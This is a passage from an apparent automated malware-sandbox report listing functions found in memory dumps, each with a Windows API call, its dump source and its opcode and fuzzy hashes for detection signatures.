Instruction Fuzzy Hash: 3141B2B1D00349DFDB14CF9AC884ADEFBB5BF48314F25822AE819AB650D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02405354, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02405411

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6f9cc039a4727e6ee4384e3737686f7eae1abd5286297fadbc3ee98808a26dc7
Instruction ID: 001af44054a03a9ab5720d3b1dd8bdaeb0174ad0c24cd74397ae40a84c0cbefe
Opcode Fuzzy Hash: 6f9cc039a4727e6ee4384e3737686f7eae1abd5286297fadbc3ee98808a26dc7
Instruction Fuzzy Hash: 2541D371D00619CFDB24CFA9C8847CEBBB5FF48309F60846AD409AB251DB756986CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02403DE8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02405411

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1adce934a3d311c39b76dba89670c8a0929f8b72e58afc101d57ab848121f9f6
Instruction ID: 9ac25351a046bb45f119ea68e0aad626f018e67a760043b720e1852f18b5efdc
Opcode Fuzzy Hash: 1adce934a3d311c39b76dba89670c8a0929f8b72e58afc101d57ab848121f9f6
Instruction Fuzzy Hash: A741E171D00619CBDB24CFA9C8847DEBBB5FF48309F60806AD409AB251DB756986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02407D68, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 02407DDD

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 21608cce9c96f8b77d16e874981e298781d85ba705eedff90b55296294bdd037
Instruction ID: 166cbdcf2e1a5b53f9d5dbf15ec5cebf0738c102517e068180a9d2eb7114c971
Opcode Fuzzy Hash: 21608cce9c96f8b77d16e874981e298781d85ba705eedff90b55296294bdd037
Instruction Fuzzy Hash: F3310170901384DFE701DF66E4843EABFE4EB14304F08446ED055A72C2C738AA86CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0240B892, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0240B91F

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 479e0e5c845e78398f75be18f586001bfe26191d1e5e6fea5f44bf00d25d1c13
Instruction ID: a6710028cc7fac21a16e074f5956999fd8c9e77fed06c0b031263045ee325f89
Opcode Fuzzy Hash: 479e0e5c845e78398f75be18f586001bfe26191d1e5e6fea5f44bf00d25d1c13
Instruction Fuzzy Hash: A32114B5D00208AFDB10CFAAD484ADEFBF4EB48324F14802AE914A3310D374A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0240B898, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0240B91F

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fac0ba1c5cf1ba0a4df98aa432d3e59cff672a2acfca5b9c0e0308a9db0fa636
Instruction ID: 7df99468e43b37624ca1a2108a68df0243594efa3106a9b19d3c43775c388390
Opcode Fuzzy Hash: fac0ba1c5cf1ba0a4df98aa432d3e59cff672a2acfca5b9c0e0308a9db0fa636
Instruction Fuzzy Hash: E821F3B5D00209AFDB10CFAAD884ADEFBF8FB48324F14801AE914A3350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02409458, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02409931,00000800,00000000,00000000), ref: 02409B42

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4c681723c58418a8c87dcdd035d5b37f367b0a236e1f5dc9de06c64deab7c088
Instruction ID: 94a0914451ced480a4aa257e765be602d6bd309770b21c6fc897ba081c1e674b
Opcode Fuzzy Hash: 4c681723c58418a8c87dcdd035d5b37f367b0a236e1f5dc9de06c64deab7c088
Instruction Fuzzy Hash: 961114B29003499FDB10CF9AD488BDEFBF4EB88724F14842AD515A7740C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02409AD1, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02409931,00000800,00000000,00000000), ref: 02409B42

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e33f8932efdbb5aabf8c42fd286019e9fb83c97bd2ec81bb599678c82872a493
Instruction ID: 67349f440ba2d7a8be37aa0a06d2ce6e5a37f7dcb352ff1521fb1dbfdfea37d0
Opcode Fuzzy Hash: e33f8932efdbb5aabf8c42fd286019e9fb83c97bd2ec81bb599678c82872a493
Instruction Fuzzy Hash: C21114B69002499FCB10CF9AD488BDEFBF4FB88724F14842AD515A7640C375A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02409848, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024098B6

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3ed62a791902cdd7cd854b35d03cf102088a04da6e1db115615153aed6f516a5
Instruction ID: eab2f78d159ad2e2cb8bab0b75f05c8dac932458b8760d64353ae1ce34d41828
Opcode Fuzzy Hash: 3ed62a791902cdd7cd854b35d03cf102088a04da6e1db115615153aed6f516a5
Instruction Fuzzy Hash: FF1120B2D0064A8FCB10CF9AD484ACEFBF4EF88624F14852AC469A7700C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02409850, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024098B6

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9e7b83cbd4029be281d7ed2763df4164124da695e26464ac56a39dd7e95c5e9b
Instruction ID: 3b1a15fb7894ff406e94adec8c3920ec94ac999f78dd012c48e512dddc45a358
Opcode Fuzzy Hash: 9e7b83cbd4029be281d7ed2763df4164124da695e26464ac56a39dd7e95c5e9b
Instruction Fuzzy Hash: DC110FB2D006498FDB10CF9AC484ADEFBF4EB88624F14852AD429A7700C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0240FF18, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0240FF7D

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ac31a5d11a694395beb4d42508381ec719b19bb3eb1fceb1617999a90a65078f
Instruction ID: 5933c15d44f9262a0e92439e53dfb6b6b3d39e7edef9b1be65ca48cb80c8aad8
Opcode Fuzzy Hash: ac31a5d11a694395beb4d42508381ec719b19bb3eb1fceb1617999a90a65078f
Instruction Fuzzy Hash: 1D11F5B59006099FDB10CF9AD485BDEFBF8EB48324F10851AD965A7740C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0240FF20, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0240FF7D

Memory Dump Source

Source File: 00000001.00000002.327091817.0000000002400000.00000040.00000001.sdmp, Offset: 02400000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a9760dd266d957daee69899b275005bd45d62bd6aeddd4e778a88e53b3a3ae30
Instruction ID: c1f1e9be0bcca73c6ed2e19a0ebaaef7017de9e239a43b219f1c9fe7be648baf
Opcode Fuzzy Hash: a9760dd266d957daee69899b275005bd45d62bd6aeddd4e778a88e53b3a3ae30
Instruction Fuzzy Hash: 301103B59006099FDB20CF9AD488BDFFBF8EB48324F10851AD915A7740C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB5997, Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

@, xrefs: 06FB5B12

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a6df7d9d8f5e6c2a020432b8e9e4f8019c1385917804f625da777441c59f0d59
Instruction ID: cbd2276429123c72208580ea6d0526b5b5076de0c248591ae1cc29b6eb408c6a
Opcode Fuzzy Hash: a6df7d9d8f5e6c2a020432b8e9e4f8019c1385917804f625da777441c59f0d59
Instruction Fuzzy Hash: B5518A75E002199FDB54CFAAC885AEEBBF5BF48310F14806AE915AB251D734DE50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06FBFA10, Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

$, xrefs: 06FBFA2F

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 8551cbdd7aa78abd6e2d5fc7c9c5ddc2302d95ba533a332b83d89b2cb7a91c99
Instruction ID: dc8b7cbd63eff369815cd67ff0841c88baf6312246a47103289d08a7b3045bea
Opcode Fuzzy Hash: 8551cbdd7aa78abd6e2d5fc7c9c5ddc2302d95ba533a332b83d89b2cb7a91c99
Instruction Fuzzy Hash: 1701A231B1524A9BCB50EF6ADC409EFBBF9EF80314F008529E5549B250D770AE098BE1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB4757, Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80d5aa87f44ec95f453699bc19019602adf9d1a2c066ca3826ffcdada7b5b8a
Instruction ID: f2c3c357c67c673beb1c63c9e43e4877c648a48a7dd00d4a3a6d9dd53da1b58a
Opcode Fuzzy Hash: f80d5aa87f44ec95f453699bc19019602adf9d1a2c066ca3826ffcdada7b5b8a
Instruction Fuzzy Hash: 58123770A00605DFC764DF69D5859AABBF2FF88300B158A68D546CB766DB34FC46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06FB89C8, Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38b539f6da3ae77c0ba3204cb83b5d67e8a6c098a47ff8aa42974a427ce6c6f
Instruction ID: c50d89bae93e96d7569ea22108759be2e1387e8172a8df6f3f2b0dff1a773779
Opcode Fuzzy Hash: b38b539f6da3ae77c0ba3204cb83b5d67e8a6c098a47ff8aa42974a427ce6c6f
Instruction Fuzzy Hash: DEE18B34B101118FCB94EF3EC594A6A77EAAFC868471584AAE916CB375EF70DC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FB1A68, Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73d793478bfb05386b849042c361e49c301d9cfae19ccc0ed3f2205367716ec4
Instruction ID: b6be688e7958cd45ad41c9e371b987b655a8374000775ec6d15ac8c75a34a485
Opcode Fuzzy Hash: 73d793478bfb05386b849042c361e49c301d9cfae19ccc0ed3f2205367716ec4
Instruction Fuzzy Hash: AB0245B1A00209DFDB44DFA9D49499DBBF2FF88314B2585A9E805EB361DB30ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06FB73F8, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69ede44b7ac364ef4ecbe7a855741ec5f55e32bc4e96ee14c005eb8a7a7332b
Instruction ID: 64795a93b28f9d87d3b168f2d2f0484da9117a02030a9ccd3ba119164f4889c4
Opcode Fuzzy Hash: f69ede44b7ac364ef4ecbe7a855741ec5f55e32bc4e96ee14c005eb8a7a7332b
Instruction Fuzzy Hash: BAD14A75A04205DFCB45DF69C8849AEBBF2FF88310B1585A9E949DB361DB30ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06FB1634, Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7162c11044cd4c3feb6b079ad01953d48de0c012760523d30cdc6eadef5d3c5
Instruction ID: 92f8a333a52bc9ea2e1b2b76d11d0f65a2162b9b1a32751e824f7888ddb8747f
Opcode Fuzzy Hash: a7162c11044cd4c3feb6b079ad01953d48de0c012760523d30cdc6eadef5d3c5
Instruction Fuzzy Hash: F9C18D34B00248DFDB45DFA5C864AADBBB2FF88314F148069E9069B3A5CB35DC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FB0220, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f158c87b7754d08fe9f0fb2709a1c1baa0154026b66da2f5a2a2ecf25073a2b
Instruction ID: 749aa7e1e3c8b4433bc165c0266561c8004506a8adebeec5bc5d6db99ba775dd
Opcode Fuzzy Hash: 5f158c87b7754d08fe9f0fb2709a1c1baa0154026b66da2f5a2a2ecf25073a2b
Instruction Fuzzy Hash: BB819D71B00306CFDB64DF2AC585AABB7F2FF84208B14892DD956C7651DB70E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FBE298, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f5dd23f0070d434a39bcffee8c82892a0175f0588e304365edf24a69bd4bc0
Instruction ID: 2db9fb4c096d7f17e4489742df40adc6c515df5e052fa0ad0b383ceddf43f80d
Opcode Fuzzy Hash: 07f5dd23f0070d434a39bcffee8c82892a0175f0588e304365edf24a69bd4bc0
Instruction Fuzzy Hash: 5A716B34B00208DFDB54DB75D998AEE7BF2AF89354F148469E406EB361DB319C42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB9EB8, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc5851dc80b67959d474cc3b1ee65e28f91e7e8e25a3b09ba33d37670eae1e7
Instruction ID: 24e42593d5c42b9766ee976c0077608332039baf4aca7daca94d68bd200f91dc
Opcode Fuzzy Hash: bdc5851dc80b67959d474cc3b1ee65e28f91e7e8e25a3b09ba33d37670eae1e7
Instruction Fuzzy Hash: A2615B70E01209AFDB54DFA9D880AAEBBB3FF89310F14842AE516A7351DB71AD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06FB0040, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1541ba684315ee7f723b418518959061848e84db65a0dd24da18b461c6a5fef9
Instruction ID: 96e65f4c855c4a28d68f89cf464a0beab664b6f58257eb887a141085cf2125db
Opcode Fuzzy Hash: 1541ba684315ee7f723b418518959061848e84db65a0dd24da18b461c6a5fef9
Instruction Fuzzy Hash: B661D7B5E002599FDB54CFA9D48099EBBF5FF48314F14406AE919EB314EB309D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06FB9EA7, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72001d20ce3f68d4b92d2ddf254c48cbbf678e92c774af02867996911f7a908
Instruction ID: aeb0dbba20212146c3bf7a49cc9938af1423378da0a3b4c1cd5c9d6eca1b6058
Opcode Fuzzy Hash: a72001d20ce3f68d4b92d2ddf254c48cbbf678e92c774af02867996911f7a908
Instruction Fuzzy Hash: 0F519970A01205AFDB55DF69D880AAEBBF3FF89310F24846AE916D7391DB709C41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06FBE0E8, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5b508969d489e938c3a0170b9004e476291d90ce45920b23cebdc41714d24d
Instruction ID: ba0513316f5c5b4634714026a66a1bf94dd4137ffcd510cd022f3d743a39b9ef
Opcode Fuzzy Hash: fc5b508969d489e938c3a0170b9004e476291d90ce45920b23cebdc41714d24d
Instruction Fuzzy Hash: E951BE35E04256DFCB51CFA9C884AEABBF2FF45360F148699E455DB2A2C730E940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06FB2C83, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af80dd6af4441b9a2907d7dcf40d96632b93060d67db2c8c7b732215273902fb
Instruction ID: 28f9f2022bc24b08c408101bd9b46e710907ed150c32cb9f646000319ad4b2c2
Opcode Fuzzy Hash: af80dd6af4441b9a2907d7dcf40d96632b93060d67db2c8c7b732215273902fb
Instruction Fuzzy Hash: 55510374E007488FDB55CFAAC884AAEFBF2BF48300F058569E499AB761D730E945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 06FB20F0, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e54c27342e11384ad0baef4a4f98ae1533c6bd2719fd68f61720f1597103aca6
Instruction ID: c815793449218546ed40dec34cbd21fe170a3d6ce55fd943892776dd07604c59
Opcode Fuzzy Hash: e54c27342e11384ad0baef4a4f98ae1533c6bd2719fd68f61720f1597103aca6
Instruction Fuzzy Hash: 25514F36B00109EFDB40DFA9D885AEEFBB6FF88310F148166EA05D7211D7319A55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06FBDB00, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47558ec33e64b47818e8eb736167414138f8f51b30cd44e4210eb011da87d252
Instruction ID: c154b5b476d0cd640820e6f073f833d493862bb7414debe9dbade31b4587e7ff
Opcode Fuzzy Hash: 47558ec33e64b47818e8eb736167414138f8f51b30cd44e4210eb011da87d252
Instruction Fuzzy Hash: BE41D676B05249AFCF02DFA5E8408EFBFBAEF892107148066F914C7211C731D925DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FB8469, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2e275564a004003db8f37ed7038cca7e192d6405b5880f338326a65da60270
Instruction ID: 66ffd3084671cc36e5acc86f899e4655c023d673a97da63617cf0b7af9ce730a
Opcode Fuzzy Hash: 4f2e275564a004003db8f37ed7038cca7e192d6405b5880f338326a65da60270
Instruction Fuzzy Hash: 5D51AEB5A00346DFC744DF28C48489ABBF2FF89314B1689A9D459CB322DB30ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06FBF690, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e35ffb0b1e1a76f2d27f80ecaa71c0a903c9e427c708216fcb673495d4a2d7ce
Instruction ID: 24de3519bdcd8740b38784a21ae0850a93f1f10db2bf606766d7d437abfbbbce
Opcode Fuzzy Hash: e35ffb0b1e1a76f2d27f80ecaa71c0a903c9e427c708216fcb673495d4a2d7ce
Instruction Fuzzy Hash: B14148397016049FD754DF2AD888D6AB7F6FF8921072545A9E14ACB772CB71EC41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 06FBA121, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e703ef68e4b30f29499cb958ca34722fe1fdbf5b120188cf5cce944c09e37e5
Instruction ID: 24834fb9b0ccc727b2c3af38f34623b192950902b4768943aaa86896cf7b5e41
Opcode Fuzzy Hash: 6e703ef68e4b30f29499cb958ca34722fe1fdbf5b120188cf5cce944c09e37e5
Instruction Fuzzy Hash: 4441D075A05250AFC745DF59D889DAEBBB6EF88320B06809AF405C7362CB34ED45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FBF848, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448731db1ec8752b25cf91b694923e3c240c3d0242daba72b6c6f37e8c19ce7d
Instruction ID: a3686c7b603e9634c94e823f4b733d33ac9777d46c5883f250b7b9c565e27727
Opcode Fuzzy Hash: 448731db1ec8752b25cf91b694923e3c240c3d0242daba72b6c6f37e8c19ce7d
Instruction Fuzzy Hash: 4A316975F012159FDB18DF6ADC808AEB3B5FF88214B1444A9D918AB355D730ED02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06FB27E0, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f59ec8c4cd1df6aec55da3e04b3ea116f2bb50d3cdb67d514767af0c7efcc7
Instruction ID: e40810fbc81ffa7171d20e7433989a37aa70920698a4ceb275b89d4d7d3d8a3d
Opcode Fuzzy Hash: 84f59ec8c4cd1df6aec55da3e04b3ea116f2bb50d3cdb67d514767af0c7efcc7
Instruction Fuzzy Hash: 7B31E170B04246AFCB119F36C8583BE7BA2EF89301F004819F9D2C7381DB3599118BA2

Uniqueness

Uniqueness Score: -1.00%

Function 06FB9258, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb143d93a92b04c41fde67de4a006a87cd60aac1fcb2f26477f2a98aca57c7a
Instruction ID: ad8707e8e94c2b41e9a6a68a4c6315397d9281312f1c57958170516f0fd2a507
Opcode Fuzzy Hash: 5cb143d93a92b04c41fde67de4a006a87cd60aac1fcb2f26477f2a98aca57c7a
Instruction Fuzzy Hash: 58310431F082948FC745ABB9D8241AE3FF6EF8B204B1548ABD656CB395DE748C05C792

Uniqueness

Uniqueness Score: -1.00%

Function 06FB0DE8, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 121aae4d08249b0af633aa4b95a6ecf27f80a0264256b2e9e5d0621a462b65b7
Instruction ID: b1164551490534638cff0d618649522d5d701def4beb28cbc4b8958b89d6e906
Opcode Fuzzy Hash: 121aae4d08249b0af633aa4b95a6ecf27f80a0264256b2e9e5d0621a462b65b7
Instruction Fuzzy Hash: 3631B171B11245AFDB54DF6AC844AAFBBB6EF85310F04856AE502DB362CB31DC40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009ED1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326744980.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52972236d28957a429afb068900afa462262353a5aa643b5d4ea80eab531b1ba
Instruction ID: 3317cb3f4be931bb1956bb54a51585a13313815c80c44715e1ce2918bda95de1
Opcode Fuzzy Hash: 52972236d28957a429afb068900afa462262353a5aa643b5d4ea80eab531b1ba
Instruction Fuzzy Hash: 07210671504280DFDF06CF55D8C4B2BBB69FB88314F248969EA050B346C33ADC56DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FBEF9F, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbaefdb3fe388beeabc885097ea45ed3e45e2c666d70bf66a85b2645ffe68fb
Instruction ID: 7b8ecef60b6476423a00af9c558eec0ece8697d2a6a2e278935f9d7477931457
Opcode Fuzzy Hash: bdbaefdb3fe388beeabc885097ea45ed3e45e2c666d70bf66a85b2645ffe68fb
Instruction Fuzzy Hash: A0319E71E01256EFCB11DF65C9849AABBF2FF48300B1585A8D848AB721D731ED51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009ED3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326744980.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3bd88028fedebf04ff58e7b42b9ae30a54df9a8811be2316bca31d1e418538b
Instruction ID: 0e6a2c57015ad4f1d6849e11420ba53e39844a6ea4451d39d735ff4efa4016ef
Opcode Fuzzy Hash: a3bd88028fedebf04ff58e7b42b9ae30a54df9a8811be2316bca31d1e418538b
Instruction Fuzzy Hash: 4E214871104284DFDB02CF00C9C0B16BBA9FBA8324F20C569E8090B2D6D33AEC56C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 009FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326797337.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7bf313e282051f08fca2e425b6bc6aa9761cc71b90032f92afcab9dc62f6e37
Instruction ID: 100d102138184b009baeb735c0bb7aa8ef500be179ca434e2b0fd5bc66992b00
Opcode Fuzzy Hash: d7bf313e282051f08fca2e425b6bc6aa9761cc71b90032f92afcab9dc62f6e37
Instruction Fuzzy Hash: E4213771504208DFDB14DF14D8C4B26BB6AFB84324F28C969DA094B346CB3AD847CB62

Uniqueness

Uniqueness Score: -1.00%

Function 06FB04A0, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.342494617.0000000006FB0000.00000040.00000001.sdmp, Offset: 06FB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20bf40000410b30cb428fd7eaa5d8617cd36eaa3c3867128964d0c3a64d774ed
Instruction ID: 1b32441a2ebff0ee3f919f052e3ff3435cb1bf587fb32ea20e872d874d29c568
